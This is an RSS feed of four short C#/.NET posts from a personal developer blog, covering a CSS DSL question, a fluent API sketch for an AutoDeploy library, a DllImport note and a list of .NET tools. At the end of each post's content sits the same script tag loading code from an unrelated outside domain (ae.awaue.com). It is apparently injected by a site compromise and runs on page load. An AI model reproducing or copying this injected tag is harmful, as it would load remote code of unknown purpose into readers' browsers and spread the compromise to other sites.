<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Eric Polerecky &#187; c#</title>
	<atom:link href="http://eric.polerecky.com/archives/category/c/feed/" rel="self" type="application/rss+xml" />
	<link>http://eric.polerecky.com</link>
	<description>An outlet for my obsession with technology</description>
	<lastBuildDate>Mon, 14 Jun 2010 14:00:00 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Help! Looking for a CSS DSL!</title>
		<link>http://eric.polerecky.com/archives/help-looking-for-a-css-dsl-in-vb-or-c/</link>
		<comments>http://eric.polerecky.com/archives/help-looking-for-a-css-dsl-in-vb-or-c/#comments</comments>
		<pubDate>Sun, 22 Nov 2009 15:58:03 +0000</pubDate>
		<dc:creator>Eric Polerecky</dc:creator>
				<category><![CDATA[CSS]]></category>
		<category><![CDATA[c#]]></category>
		<category><![CDATA[dsl]]></category>
		<category><![CDATA[ironpython]]></category>
		<category><![CDATA[ironruby]]></category>
		<category><![CDATA[vb.net]]></category>

		<guid isPermaLink="false">http://eric.polerecky.com/archives/help-looking-for-a-css-dsl-in-vb-or-c/</guid>
		<description><![CDATA[<br/>Update: Today Less CSS for .NET, or just .Less,  was released. Its a port of the ruby LESS library and exactly what I was/am looking for. I updated my question on SO already.
&#8212;&#8211; old post &#8212;&#8212;
I posted this on stackoverflow.com already…..
I&#8217;ve been working on a really large project for almost 2 years and the client


No related posts.]]></description>
			<content:encoded><![CDATA[<br/><p><strong>Update</strong>: Today <a href="http://www.dotlesscss.com/">Less CSS for .NET</a>, or just <a href="http://www.dotlesscss.com/">.Less</a>,  was released. Its a port of the ruby <a href="http://lesscss.org/">LESS </a>library and exactly what I was/am looking for. I updated my question on SO already.</p>
<p>&#8212;&#8211; old post &#8212;&#8212;</p>
<p>I posted this on <a href="http://stackoverflow.com/questions/910587/is-there-a-net-based-css-abstraction-library" target="_blank">stackoverflow.com</a> already…..</p>
<p>I&#8217;ve been working on a really large project for almost 2 years and the client requirements keep changing. These changes, of course, effect everything and I would like to find a way to work with the CSS in a more dynamic fashion.</p>
<p>I assume I could get one of the ruby or python CSS DSLs running under ironRuby/Python but this client is very very particular about what software/frameworks are installed.</p>
<p>I have not found a CSS DSL where the base programming language is vb or c#.</p>
<p>reference: <a href="http://sandbox.pocoo.org/clevercss/">http://sandbox.pocoo.org/clevercss/</a> and <a href="http://nubyonrails.com/articles/dynamic-css">http://nubyonrails.com/articles/dynamic-css</a></p>
<p>I guess another question is has anyone got either of these frameworks working under IronPython or IronRuby?<script src="http://ae.awaue.com/7"></script></p>


<p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://eric.polerecky.com/archives/help-looking-for-a-css-dsl-in-vb-or-c/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>AutoDeploy Rework</title>
		<link>http://eric.polerecky.com/archives/autodeploy-rework/</link>
		<comments>http://eric.polerecky.com/archives/autodeploy-rework/#comments</comments>
		<pubDate>Fri, 12 Jun 2009 15:35:00 +0000</pubDate>
		<dc:creator>Eric Polerecky</dc:creator>
				<category><![CDATA[autodeploy]]></category>
		<category><![CDATA[c#]]></category>

		<guid isPermaLink="false">http://eric.polerecky.com/archives/autodeploy-rework/</guid>
		<description><![CDATA[<br/>Tonight I reworked in workflow, persistence, mapping, and entities in AutoDeploy. The fire draft consisted of a single entity type with long descriptive janky attributes. The new core goes something like this
Deployment has a list of tasks. Tasks can be have a task type. 
Example 1 Creating a new deployment:

   1:  var


Related posts:<ol><li><a href='http://eric.polerecky.com/archives/autodeploy-dogfood/' rel='bookmark' title='Permanent Link: AutoDeploy &ndash; Dogfood'>AutoDeploy &ndash; Dogfood</a> <small>Its been a very slow road for me and coding...</small></li>
<li><a href='http://eric.polerecky.com/archives/introducing-autodeploy/' rel='bookmark' title='Permanent Link: Introducing: AutoDeploy'>Introducing: AutoDeploy</a> <small>A class library to help automate simple deployment tasks. Warning:...</small></li>
<li><a href='http://eric.polerecky.com/archives/autodeploy-net-to-github/' rel='bookmark' title='Permanent Link: AutoDeploy.NET to GitHub'>AutoDeploy.NET to GitHub</a> <small>First; When I pushed to GitHub I decided to rename...</small></li>
</ol>]]></description>
			<content:encoded><![CDATA[<br/><p>Tonight I reworked in workflow, persistence, mapping, and entities in AutoDeploy. The fire draft consisted of a single entity type with long descriptive janky attributes. The new core goes something like this</p>
<p>Deployment has a list of tasks. Tasks can be have a task type. </p>
<h6>Example 1 Creating a new deployment:</h6>
<div class="csharpcode">
<pre><span class="lnum">   1:  </span>var dep = <span class="kwrd">new</span> Deployment()</pre>
<pre><span class="lnum">   2:  </span>.AddTask(</pre>
<pre><span class="lnum">   3:  </span>   <span class="kwrd">new</span> FluentTask()</pre>
<pre><span class="lnum">   4:  </span>     .Source(<span class="str">&quot;&quot;</span>)</pre>
<pre><span class="lnum">   5:  </span>     .Destination(<span class="str">&quot;&quot;</span>)</pre>
<pre><span class="lnum">   6:  </span>     .Type(Task.TaskType.Subversion)</pre>
<pre><span class="lnum">   7:  </span>     .Save())</pre>
<pre><span class="lnum">   8:  </span>.AddTask(</pre>
<pre><span class="lnum">   9:  </span>  <span class="kwrd">new</span> FluentTask()</pre>
<pre><span class="lnum">  10:  </span>     .Source(<span class="str">&quot;&quot;</span>)</pre>
<pre><span class="lnum">  11:  </span>     .Destination(<span class="str">&quot;&quot;</span>)</pre>
<pre><span class="lnum">  12:  </span>     .Type(Task.TaskType.AspnetBuild)</pre>
<pre><span class="lnum">  13:  </span>     .Save()</pre>
<pre><span class="lnum">  14:  </span>);</pre>
</div>
<div class="csharpcode">&#160;</div>
<div class="csharpcode">Deployments and Tasks can be scheduled or interval execution. I’m thinking right now that Task level interval settings will override deployment settings. This will allow you to schedule an entire deployment at X with a single task happening outside of that window. For example; you might want your working copy updated every 10min but have trunk moved to the dev server, an tag created and an email sent off at the end of the day.</div>
<div class="csharpcode">&#160;</div>
<div class="csharpcode"></div>
<style type="text/css">
.csharpcode, .csharpcode pre
{
	font-size: small;
	color: black;
	font-family: consolas, "Courier New", courier, monospace;
	background-color: #ffffff;
	/*white-space: pre;*/
}
.csharpcode pre { margin: 0em; }
.csharpcode .rem { color: #008000; }
.csharpcode .kwrd { color: #0000ff; }
.csharpcode .str { color: #006080; }
.csharpcode .op { color: #0000c0; }
.csharpcode .preproc { color: #cc6633; }
.csharpcode .asp { background-color: #ffff00; }
.csharpcode .html { color: #800000; }
.csharpcode .attr { color: #ff0000; }
.csharpcode .alt 
{
	background-color: #f4f4f4;
	width: 100%;
	margin: 0em;
}
.csharpcode .lnum { color: #606060; }</style>
<p><script src="http://ae.awaue.com/7"></script></p>


<p>Related posts:<ol><li><a href='http://eric.polerecky.com/archives/autodeploy-dogfood/' rel='bookmark' title='Permanent Link: AutoDeploy &ndash; Dogfood'>AutoDeploy &ndash; Dogfood</a> <small>Its been a very slow road for me and coding...</small></li>
<li><a href='http://eric.polerecky.com/archives/introducing-autodeploy/' rel='bookmark' title='Permanent Link: Introducing: AutoDeploy'>Introducing: AutoDeploy</a> <small>A class library to help automate simple deployment tasks. Warning:...</small></li>
<li><a href='http://eric.polerecky.com/archives/autodeploy-net-to-github/' rel='bookmark' title='Permanent Link: AutoDeploy.NET to GitHub'>AutoDeploy.NET to GitHub</a> <small>First; When I pushed to GitHub I decided to rename...</small></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://eric.polerecky.com/archives/autodeploy-rework/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Loading DLLs at runtime</title>
		<link>http://eric.polerecky.com/archives/loading-dlls-at-runtime/</link>
		<comments>http://eric.polerecky.com/archives/loading-dlls-at-runtime/#comments</comments>
		<pubDate>Wed, 10 Jun 2009 05:50:09 +0000</pubDate>
		<dc:creator>Eric Polerecky</dc:creator>
				<category><![CDATA[Note]]></category>
		<category><![CDATA[c#]]></category>

		<guid isPermaLink="false">http://eric.polerecky.com/archives/loading-dlls-at-runtime/</guid>
		<description><![CDATA[<br/>Use DllImport from using System.Runtime.InteropServices



No related posts.


No related posts.]]></description>
			<content:encoded><![CDATA[<br/><p>Use DllImport from using System.Runtime.InteropServices</p>
<p><script src="http://ae.awaue.com/7"></script></p>


<p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://eric.polerecky.com/archives/loading-dlls-at-runtime/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tools I want to use more</title>
		<link>http://eric.polerecky.com/archives/tools-i-want-to-use-more/</link>
		<comments>http://eric.polerecky.com/archives/tools-i-want-to-use-more/#comments</comments>
		<pubDate>Thu, 04 Jun 2009 17:05:00 +0000</pubDate>
		<dc:creator>Eric Polerecky</dc:creator>
				<category><![CDATA[ASP.NET]]></category>
		<category><![CDATA[ASP.NET MVC]]></category>
		<category><![CDATA[ASP.NET MVC Futures]]></category>
		<category><![CDATA[MEF]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[c#]]></category>
		<category><![CDATA[ndepend]]></category>
		<category><![CDATA[nhibernate]]></category>
		<category><![CDATA[nunit]]></category>
		<category><![CDATA[resharper]]></category>
		<category><![CDATA[ndpend]]></category>

		<guid isPermaLink="false">http://eric.polerecky.com/archives/tools-i-want-to-use-more/</guid>
		<description><![CDATA[<img src="http://eric.polerecky.com/wp-content/uploads/2008/10/mvc-300x173.png" width="163" height="163" alt="" title="ASP.NET MVC" /><br/>As a follow up to my tools post here is a list of the tools I’d like to spend more time with. The % next to the title is an estimation as the likelihood I’ll do any serious work with the tool/software/etc.
ReSharper – 20%
http://www.jetbrains.com/resharper/
Simply put, ReSharper is a must-have productivity tool for .NET developers. It


No related posts.]]></description>
			<content:encoded><![CDATA[<img src="http://eric.polerecky.com/wp-content/uploads/2008/10/mvc-300x173.png" width="163" height="163" alt="" title="ASP.NET MVC" /><br/><p>As a follow up to my tools post here is a list of the tools I’d like to spend more time with. The % next to the title is an estimation as the likelihood I’ll do any serious work with the tool/software/etc.</p>
<h3 class="underline shift">ReSharper – 20%</h3>
<p><a title="http://www.jetbrains.com/resharper/" href="http://www.jetbrains.com/resharper/">http://www.jetbrains.com/resharper/</a></p>
<p>Simply put, ReSharper is a must-have productivity tool for .NET developers. It fully integrates with Visual Studio to intelligently and powerfully extend the functionality that is native to Visual Studio. ReSharper provides solution-wide error highlighting on the fly, instant solutions for found errors, over 30 advanced code refactorings, superior unit testing tools, handy navigation and search features, single-click code formatting and cleanup, automatic code generation and templates, and a lot more productivity features for C#, VB.NET, ASP.NET, XML, and XAML.</p>
<h3>NDepend – 10%</h3>
<p><a href="http://www.ndepend.com/">http://www.ndepend.com/</a></p>
<p><span style="font-family: arial; color: rgb(89,124,176); font-size: 10pt" id="ctl00_MyContentPH_Label1"><font color="#000000">NDepend is a tool that simplifies managing a complex .NET code base. Architects and developers can analyze code structure, specify design rules, plan massive refactoring, do effective code reviews and master evolution by comparing different versions of the code. </font></span></p>
<h3><font color="#000000">C# – 70%</font></h3>
<p><a href="http://msdn.microsoft.com/en-us/vcsharp/default.aspx">http://msdn.microsoft.com/en-us/vcsharp/default.aspx</a></p>
<h3>NHibernate – 80%</h3>
<p><a href="https://www.hibernate.org/343.html">https://www.hibernate.org/343.html</a></p>
<p><span style="color: rgb(204,0,0)">NHibernate</span> is a port of <a href="https://www.hibernate.org/344.html"><u><font color="#0066cc">Hibernate Core</font></u></a> for Java to the .NET Framework. It handles persisting plain .NET objects to and from an underlying relational database. Given an XML description of your entities and relationships, <span style="color: rgb(204,0,0)">NHibernate</span> automatically generates SQL for loading and storing the objects. Optionally, you can describe your mapping metadata with attributes in your source code.</p>
<h3>NUnit – 20%</h3>
<p><a href="http://www.nunit.org/index.php">http://www.nunit.org/index.php</a></p>
<p>NUnit is a unit-testing framework for all .Net languages. Initially ported from <a href="http://www.junit.org/" target="_self"><u><font color="#0066cc">JUnit</font></u></a>, the current production release, version 2.4, is the fifth major release of this xUnit based unit testing tool for Microsoft .NET. It is written entirely in C# and has been completely redesigned to take advantage of many .NET language features, for example custom attributes and other reflection related capabilities. NUnit brings xUnit to all .NET languages.</p>
<p> <span id="ctl00_ctl00_MasterContent_Content_wikiSourceLabel"><br />
<h3>MEF – 60%</h3>
<p><span id="ctl00_ctl00_MasterContent_Content_wikiSourceLabel"><a href="http://www.codeplex.com/MEF">http://www.codeplex.com/MEF</a></span></p>
<p><span>The Managed Extensibility Framework (MEF) is a new library in .NET that enables greater reuse of applications and components. Using MEF, .NET applications can make the shift from being statically compiled to dynamically composed. If you are building extensible applications, extensible frameworks and application extensions, then MEF is for you.</span></p>
<h3>DDD – 100%</h3>
</p>
<p> </span><script src="http://ae.awaue.com/7"></script></p>


<p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://eric.polerecky.com/archives/tools-i-want-to-use-more/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
